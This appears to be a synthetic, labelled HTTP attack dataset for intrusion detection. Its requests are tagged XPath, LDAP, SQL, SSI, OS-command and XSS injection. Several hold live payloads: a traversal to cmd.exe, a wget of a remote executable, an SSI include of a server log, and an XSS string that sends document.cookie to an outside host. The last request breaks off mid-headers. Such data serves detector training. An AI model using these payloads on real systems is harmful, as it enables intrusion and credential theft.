ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Sun, 10 Apr 05 15:21:35 UTC
If-Unmodified-Since: Sun, 04 Apr 04 10:55:04 GMT
If-Match: "dE6XbxLs5Rag4RPx"
If-None-Match: "94kSwCR_xV_@Zxye"
If-Range: Tue, 28 Feb 06 08:57:46 CET
Max-Forwards: 365
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM czRtdGlldHNTck5sbHRzZ3VlaWF0dHM2SWNlYThpcGw=
Authorization: Basic dHZyb2VpOmk0aEVpNA==
Range: -5
Referer: /1esa.txt
TE: chunked
Trailer: Referer
User-Agent: e526Id/4.4.7.5.0
UA-CPU: MIPS
UA-Disp: 750,0599,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 7.0 www.echssscn.htm, 7.7 www.Tero.tiff
Transfer-Encoding: identity
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 85538465859468
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36592
Start - Id: 48557
class: XPathInjection
PUT /acnTIgrCJ/grCeceeh/hGaH-tiCha7JVi7GT/eZFORS/r2taudtctAodysTrhc/BfDKX2.4id7servicesY@wT/rtimattHaofnP.css? HTTP/1.1
Content-Length: 298
Content-Language: yf,teENN
Content-Encoding: identity
Content-Location: http://www.Baal.biz/nggcem/neelnQge/aTwjaitc/fn9utw.cgi
Content-MD5: YUVyZWx0N0VubG9rTmVkZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Sat, 05 Aug 06 17:40:46 UTC
Host: 200.108.69.144:4
Connection: Acee
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=87
Client-ip: 26.231.14.90
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="8"
Date: Sun, 20 Jul 08 23:45:05 UTC
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Fri, 05 Feb 10 09:51:35 GMT
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: *
If-None-Match: "BA_MHBrJyt@TonsTstN"
If-Range: "SWy.FoMZ1UPqwR0UbO"
Max-Forwards: 85
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM aWlsc3Bvc2V1dG9laHRjZXJXb3V0b2VpaWFlZWVyYWF0dGZ0YWlJbGE=
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 937233-073734,-13,-768
Referer: /hso4bd.exe
TE: trailers,deflate;q=0.7
Trailer: Via
User-Agent: ia@xfg http://www.eege5O.com
UA-CPU: StrongARM
UA-Disp: 2908,9185,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 429x1759
Via: HTTP/8.0 www.NdhwVFa.jpeg, 3.6 www.hOtna.js, 6.0 www.sehtk9.tiff
Transfer-Encoding: deflate
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 221 www.Tjeo.jpg "mhTIthjmdIiio6h9eh" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MiSu=onodegiintt3Eni&K4buAvr-au.=o|o 7&szxzAqhilimo=Ei&ujetc_KGF=m.xOE&jpt=d8Iaccess_log&&ede43exc=hDa5&sbSQattXiktnioe=hKlxpWpehlx&nbdTyaIsopeag1c=aICWOSpuE&0rrhia=gieaeedd'  or  6   <  count(path/child::*)   or 'jEhi'   =   '&sfea3mW=bTSeJrT6j&sfr6trqan=71403&ri=4949069

End - Id: 48557
Start - Id: 40917
class: SSI
GET /h5ownhamlnem/hHUrcSJi3klpu0nt3uk6/RCS/tsmtU8v/osXTDKk/cid4fuetbiw/ahhoc/Kw14cesPu/eds4FTbnetbq.mdb?6wnlnaasl=%29llogr5q&oTma7ti=gf6rEioLrco&kabseruwhbsgi=863&oXl1ij=od%7EenlUcfnhd%7Co&snsnp47tm=%3C%21--++++%23odbc+++++statement++%3D++%22select+++++c4so%2C+++ovosD%2C++tfsohir+++++from+++++tbtalse2+++++order+by+++++6%2C++++65%2C++5%22+++++--%3E&oum4i=aaeomhOs%25hisq&acetxssgSSdal7=0tordzamevalndd HTTP/1.1
Host: www.lnwe62.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8, windows-1255, us-ascii;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 251.136.125.73
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="3"
Date: Mon, 28 May 07 10:06:58 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: rep1c=eqeOqmar;smtnc3
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: "PSEzn77E@@YPz-fz"
If-Range: Sun, 08 Nov 09 08:31:55 CET
Max-Forwards: 343
MIME-Version: 9.9
Pragma: nii=tnieOy
Authorization: NTLM ZXV0Q24zdm90aXVhYW9neW9OZWx0c3J1aDdyaXN4YWJzNHNuZUU=
Range: -200220
Referer: http://www.rtrr.uk/ebnue.php
TE: gzip;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: loIate2het (eLC@vIC; 8Isf5kqBK; 75kT4.y; r.MBYs; irhBbkOBM9)
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/2.0 www.RmsIp.jpeg, hnEs/1.6 214.44.60.105, 9.6 62.144.17.199
Transfer-Encoding: gzip
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40917
Start - Id: 43678
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.omEos.biz:80
Connection: keep-alive
Accept: application/*;q=0.5, video/mpeg, image/*;q=0.3
Accept-Charset: x-mac-arabic;q=0.7, iso-2022-jp;q=0.8, euc-kr;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: 95-2, deidies-3Erolnn, t-nZ;q=0.3, eMiea-rrnlrtrm, wnde-shRes
Cache-Control: no-cache
Client-ip: 10.124.19.16
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Thu, 17 Apr 08 22:33:05 UTC
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: l9owie
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Fri, 09 Jan 09 14:07:36 CET
If-Match: *
If-None-Match: "6FUvDFJhYCwcMuLU"
If-Range: Sun, 05 Dec 04 01:14:29 GMT
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="lieew"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: http://ccfha.de/ootaeyls/oeyt.wav
TE: trailers,chunked
User-Agent: aByLib5x http://www.oanm.net
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: HTTP/9.2 234.218.43.74
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43678
Start - Id: 37635
class: LdapInjection
PUT /d_3A7-8fLPmhsGH16DzN/k.@djwcb0@UT/kqeval3Uy/hcoetshQ/oTkW9sPE5dmlEcLa3Oan.shtml? HTTP/1.1
Content-Length: 209
Content-Language: HhbbilD
Content-Encoding: compress
Content-Location: http://3OhhaO.net/eapr11/Aheney3/ou23o8/ewupcjfs/H9hbt.jsp
Content-MD5: dGdkY29ld2F0YXBjcXRtVA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jun 06 22:12:00 GMT
Last-Modified: Fri, 26 Jan 07 22:35:59 UTC
Host: 146.178.111.165
Connection: elUsRaMC
Accept: video/mpeg, text/plain
Accept-Charset: windows-874;q=0.4, x-mac-greek;q=0.4, x-mac-icelandic, gb2312
Accept-Encoding: gzip, gzip, gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 107.128.53.200
Cookie: jhawoccn=ih(;u5<trlibboall%rts
Cookie2: $Version="477"
Date: Tue, 24 Feb 09 21:37:37 GMT
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Sat, 30 Jun 07 20:33:18 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "I._WofJ-xkYMZu_"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: irrl=cayvhxo
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: nltei epniie=dzlns
Range: 70-,507-
Referer: http://www.7icEsdn.org/s0ew/nc1stsep/9tTiF/enij2EOd/akicfh.bin
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 8.5; tX-8e; rv:7.1.0) Gecko/44005586
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 9.5 14.135.135.53, HTTP/9.6 www.eealorex.html
Transfer-Encoding: oo2rF1; vii9w8=zsspt
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 011740300898
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i0fsditoNPdb=wke5tl5rAn&feddflene=6863119&g1uaa6nra= a(/5&tlq&Inai=r<opti&documentMhttpsrtmpEuJa=l&qovglFpa5b=tjmgf7B8&lt=9d:E&troHa=")(targetfilter=(o=NetscapeRoot))&ie4ttss=wtcgsoIs

End - Id: 37635
Start - Id: 43242
class: OsCommanding
GET /oSkPyJwNjX/XEFpcbetweenRaUpq/drcseptv/e9Cmg4DC/asae4a9aMo/fLuykD49JTqL/tewSdrntxsrrsteuue0t/njBb_.RPkSPqBb6SsEg/eWlo7Mlfq2rgTY/Gacceptn-@a2Q8L.php?xofboee8tglisd=boH&e6rer0D=istdAT8esepem&Odaw9vsDrtdf=lrp7&zeirsEkklitdd5y=yMIhe&epl0hsie8=%5Cn++++wget+++http%3A%2F%2F196.69.83.237%3A96%2Fnftp.exe&ehoemaa=eo&AeTduhseen=+n%2F HTTP/1.1
Host: www.enrs.fr:80
Connection: close
Accept: audio/basic, application/x-tar;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.1, identity, compress
Accept-Language: *
Cache-Control: min-fresh=24
Client-ip: 160.83.211.73
Cookie: 0uwgdm=rIQpDAMZ
Cookie2: $Version="8"
Date: Sat, 05 Jul 08 08:15:05 CET
ETag: "C3D.70knu_pQ_crGa"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Mar 05 02:46:54 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 90
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b2hqOFQ6YWVpdQ==
Range: -330,06836-
Referer: http://ocmrmh.st/Slamsusl/9dmA/Oa2srC/lpXwul2/jyNhagr.mp3
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.3 (Windows; U; WinNT 1.7; lt-ee; rv:4.3.5) Gecko/72291694
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: HTTP/7.0 84.67.21.236, HTTP/2.7 www.rOhnact.png:5
Transfer-Encoding: deflate
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 136.143.222.59
X-Serial-Number: 3809752703652
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43242
Start - Id: 48350
class: XPathInjection
GET /ndyee19/fkAJmyTgwB5piOWyCB/qa/aAOPCdSYmk5xbd7rb_L0.tiff?deleteP0nim7=toohoai%272nxbca&hTop=51374386&adtEsee9g=647222&Kx84_ygroup byhHcI=mop%7C HTTP/1.1
Host: 36.51.144.156
Connection: close
Accept: image/png, audio/basic
Accept-Charset: iso-8859-15, x-mac-roman;q=0.7
Accept-Encoding: gzip, deflate;q=0.8
Accept-Language: (i     <  count(aa/child::text())  and   j     < count(eRicu8/child::comment())    and  k     <     count(s6teD/child::*) )
Cache-Control: max-age=156
Client-ip: 201.243.131.154
Cookie: fpnhsUnEmir=shtNi(
Cookie2: $Version="2"
Date: Wed, 13 Sep 06 10:33:26 GMT
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: 5kOh80fg
From: aloit2ef@imcvhU.st
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Tue, 10 Jun 08 15:09:24 CET
If-Match: "tjEpXq-MJp6.c6Dwh"
If-None-Match: "1.HyfQccdZ@9TsPALc_O"
If-Range: Fri, 18 Jun 04 05:35:33 UTC
Max-Forwards: 0728
MIME-Version: 4.9
Pragma: ene4dtcO='m8os'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: Digest algorithm=dmeipio
Range: -579124,02412-
Referer: /rsromLei/a0ahHnes.tiff
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: birN9/0.8.3
UA-Color: color32
UA-Pixels: 784x5970
Via: 1.0 www.ew5jhn.png, 8.8 www.iet6.htm, 6.2 79.65.180.171:97
Transfer-Encoding: gzip
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48350
Start - Id: 36915
class: LdapInjection
PUT /keuU_2nFL2hHoCs1GBv4/aC8dt/saXZn@TOPz7f0/.wpassthrurTf4h.asp? HTTP/1.1
Content-Length: 270
Content-Language: Ti,nt4
Content-Encoding: compress
Content-Location: http://rdrbdst.fr/pimfyyrl/adarh1i/mwqi/nLfne.js
Content-MD5: Y2k5YWxiYXBsYmhlaTl0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 04 08:10:12 CET
Last-Modified: Thu, 26 Jul 07 24:50:59 UTC
Host: www.ynmun.be
Connection: btouoHo
Accept: text/html;q=0.0, audio/x-wav;q=0.4, application/x-tar
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: tc='iaiitzh'
Client-ip: 46.117.86.31
Cookie: ujYbKx=kqho 
Cookie2: $Version="09"
Date: Thu, 11 Aug 05 24:54:51 GMT
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Sat, 02 Jun 07 13:34:42 CET
If-Unmodified-Since: Thu, 11 Jun 09 04:06:43 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 928
MIME-Version: 8.8
Pragma: xpmpsct='soeAsaos'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest username="snspsns"
Range: 03-
Referer: /t0uac/sgcrtii/flnpi0l.jpg
TE: trailers,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 3.6; o0-s7; rv:7.7.3) Gecko/46595640
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: S9az/8.2 38.136.75.175
Transfer-Encoding: gzip
Upgrade: jxf/7.0, xtlsth/8.7
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

at=")(targetfilter=(o=NetscapeRoot))&ctenihvazo=3561&ieeraaifn9inuy7=jfe&daebeiapng=dcy9s2azhpl6tu&fnd=%noyxoro&earmn8hi2nAnfe=rFjDqwDsPvf&iawe93jltate=445002936&esicnnvtilgd=tEawns70gaein&0nsmUhcatl=hLiti u acceptEws&x5awNdRU8gpx=EeAeaeweadtmp15mo+r

End - Id: 36915
Start - Id: 35148
class: SqlInjection
POST /nS/0gZlssf96Miframe6h/nebiudeHrat/eodMgM/eoxeaDpd5Zd/nXl29U@tUl_CGc7@M.cgi? HTTP/1.1
Content-Length: 47
Content-Language: je,EAeBSI,eE
Content-Encoding: deflate
Content-Location: /to6eee.swf
Content-MD5: cnU4dG5pZWFhbmdsVGR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Oct 08 06:28:06 UTC
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: 24.176.146.191
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, compress, identity;q=0.2, gzip;q=0.5
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="70"
Date: Wed, 20 Jun 07 17:36:22 GMT
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 22 Jan 06 09:10:46 UTC
If-Match: *
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 645
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: Basic ZDJlbjp0bGFsZjRu
Range: 09864-135,-87
Referer: /e96cysog/evhiteda/lrKyn/anh1bp/snYn.pl
TE: trailers,trailers,trailers
User-Agent: ato8boh/3.1.4.8.6
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: gzip
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uon=cYkI&be7rh7=OR 'kn'    =   N'   '

End - Id: 35148
Start - Id: 37584
class: LdapInjection
POST /eK8EW4kO/ml08yqvHTVdYw_2/e3fdxLi83G2/egrreiotrU.tiff? HTTP/1.1
Content-Length: 346
Content-Language: mtyt,ohin,meawtnxm
Content-Encoding: deflate
Content-Location: /godoo/Sioo.msf
Content-MD5: bmV0eGxyeWllcm5uaHAzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Mon, 09 Feb 09 18:44:30 GMT
Host: www.rnuEhnxt.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-15, iso-8859-6, euc-jp, iso-8859-5;q=0.8, isiri-3342;q=0.1
Accept-Encoding: deflate, compress, deflate, gzip;q=0.8
Accept-Language: tin3esoc-l, go-gwnmttat
Cache-Control: max-stale
Client-ip: 155.85.242.243
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="5"
Date: Sun, 29 Nov 09 19:35:10 UTC
ETag: W/"da4gNFk3QNSW1bCYzLD"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Wed, 21 Nov 07 07:35:36 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Sun, 17 Dec 06 12:50:19 UTC
Max-Forwards: 6
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM ZXdiTmplbHRpaEJiaTNhaXNtcG1jbXJyZWllcjllVGhvemk=
Range: 9-357
Referer: http://www.shpcs.biz/r77gns9D/gm4snit/alilpao/rPmribsd/eftt3aeh.php4
TE: deflate;q=0.6,chunked
Trailer: If-None-Match
User-Agent: reuurse3e/9.5
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: HTTP/7.6 40.145.238.130, Ieeeto/5.5 www.clbf.htm, 9.8 www.i69or.js:58
Transfer-Encoding: deflate
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 403 254.22.140.185:97 "tfj3g2" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9itae3=roeies&bU@4S1zsPTOq=709&iolnhv4unnoi6rn=606891&gl=snT oqt94coo d 3h&hnsdhd2athttO=i&Ri32teohnddrcds=d8oefMo rt &fW2ZziAQKWnA=eNZ&nr3a2g8if=7&re=z63iibin&fondzTa&hidtunhhfsee73w=3y7kl3artashcrntRl&t5n4=aewxUw&zeyyemndM=iaycn>;stDmre'tur&l85like=jo-connecte:updatehhtq&RISNJQy=Aa2tT)(&(objectClass =    ai*)&ae=42808601

End - Id: 37584
Start - Id: 39665
class: SSI
GET /t_Q/t0tqxajHY30l_Tt.png?grss6Niuoiln=k&fn5rsigatyat0s=aies5tLtl&OHZgOyfetc9njk=%3C%21--+++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&gqeNeN=si61unzK&nede0hst=weiMegninetcathemuh&JScb.rH=tsptneiad6cvw&esnm=o+zx&b4ibopoasn7yo=022&oc1e5d=oPz&Deb8vxIaxdoSee=aVCyfYZPBiw6&kseOemesLvsnnua=334&dnCqM0aN4s=64 HTTP/1.1
Host: 26.136.70.112
Connection: keep-alive
Accept: video/*, image/*, application/rtf
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.8, deflate;q=0.3, identity, identity;q=0.7
Accept-Language: Nqehc-od, nan-erncgea;q=0.3
Cache-Control: no-transform
Client-ip: 1.35.61.145
Cookie: T_3UgY=iva ;iaee=b5Wa;rp8scoxb=5966;on=tb 2a3ddmdx4zH;onninAx=5482205783;stvrsr8=pbinhssbin 
Cookie2: $Version="0"
Date: Fri, 19 Jan 07 18:02:31 GMT
ETag: W/"@SqQ0wgGgYvjaSt"
Expect: Nt5znH=tdnfAI4n
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Thu, 28 Oct 04 01:12:12 UTC
If-Unmodified-Since: Sun, 17 Jul 05 13:38:19 GMT
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 37
MIME-Version: 9.9
Pragma: msrirae='rt1yfe'
Proxy-Authorization: Digest opaque="mwba"
Authorization: erx4y glpob=ItiEseao
Range: -7190
Referer: http://www.aReee3et.st/deiion3/lqhe.mpg
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: rtc7 (r3pAGB; naP-GlXUBy; ibKssEyIb; eBnQen; 7Jt30p)
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8969x195
Via: 1.0 www.oOl2.tiff
Transfer-Encoding: q0ttU; 8Rse6n=hncotdey
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39665
Start - Id: 38561
class: LdapInjection
GET /rKYYFBTEYQ@U5fEa/dl1/aS0v4jqAzSToTU5iZtXk/dildrgtuij6neebi/gt3/mwCyNHEb/K00ac.4g93J7IDmI/rxixjI6@Oc@J_L/tht/el51m.asp?hst5ox=wh&dpy1qhysesara=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.Reteede.ch
Connection: nYohbf
Accept: video/mpeg, audio/x-wav;q=0.4, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="8"
Date: Sun, 07 Feb 10 03:53:10 UTC
ETag: "NleyT9id4hORF0K"
Expect: sz4c0e
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Mon, 17 Jan 05 03:53:45 CET
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: *
If-None-Match: "TLY7LRv2Atgq5Ufdw"
If-Range: "A-jDpJflhN@CSYCe92s"
Max-Forwards: 1015
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest realm
Range: -956,35-
Referer: http://www.ciet.com/clleatw/efl9wTe/nhriij.tiff
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (compatible; eELat; SunOS sun4u; cosop63elq; jyhd8)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 745x811
Via: 7.6 www.tir1e7v.css, 4.5 82.191.127.122
Transfer-Encoding: identity
Upgrade: sngbx/2.1, isltnt/7.9
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38561
Start - Id: 47132
class: XSS
GET /ikh/n5ltitoebhanwro/9Rhctamsn5yencany/nwp_3/3winntWbyZLq4tT4s/d85R7nc_JzY/uUVJHPk8rp/Aewopt/hkptt4ePdrdiiroeskie/rXFe6UW.d6fCH2@immW.dll?6iuana=%3Ca+href+%3D++%22+++++about%3A%3Cs%26%2399%3Bript++++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.nsse.com%2Fcgi-bin%2Fieasatliri.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E+++%22%3E&miNim0=fo&nlwehust=9&xelEdntERaEoie=041529122&zaDvmoq=ua%3DThssock_streamwaandtsl%3Eh&m4lhesh2=94s&aarmIoto0s4bb=-Z&Aaiunee=mevalc&oohNncp8slt=319&aajqhhac4adnc=mprocessing-instruction7sle%2Bohi4hgesioph&ebtrt6=8688&q50@U3X=%5Din&rVtuPiefr=516863&iloTteod=0814 HTTP/1.1
Host: www.tTeioe5.de:72
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: koi8;q=0.0, utf-7;q=0.5
Accept-Encoding: *
Accept-Language: l2ltb-s;q=0.5, seoah-9ree8s, riensst-t;q=0.8
Cache-Control: no-cache
Client-ip: 136.159.131.62
Cookie: gXservicesBr436replacels=e;ssi0yecEhifnri=echoonupasswdepe?ai;mr6i9iygsnl=JtSb@perles+o
Cookie2: $Version="12"
Date: Sat, 05 Jan 08 16:20:46 CET
ETag: "AAuuoYmaPm5p8GnR"
Expect: dwai6Nt=atnc48
From: dy0mird@eelb.it
If-Modified-Since: Tue, 15 Apr 08 06:34:26 GMT
If-Unmodified-Since: Fri, 25 Apr 08 02:49:02 GMT
If-Match: *
If-None-Match: "pLcI7SowcJ2H1wjVc"
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 791
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic dG5kTGM6dG93ZTQ1
Range: -63707,310050-133
Referer: http://pthpf.uk/bvcEheT.wav
TE: gzip
Trailer: TE
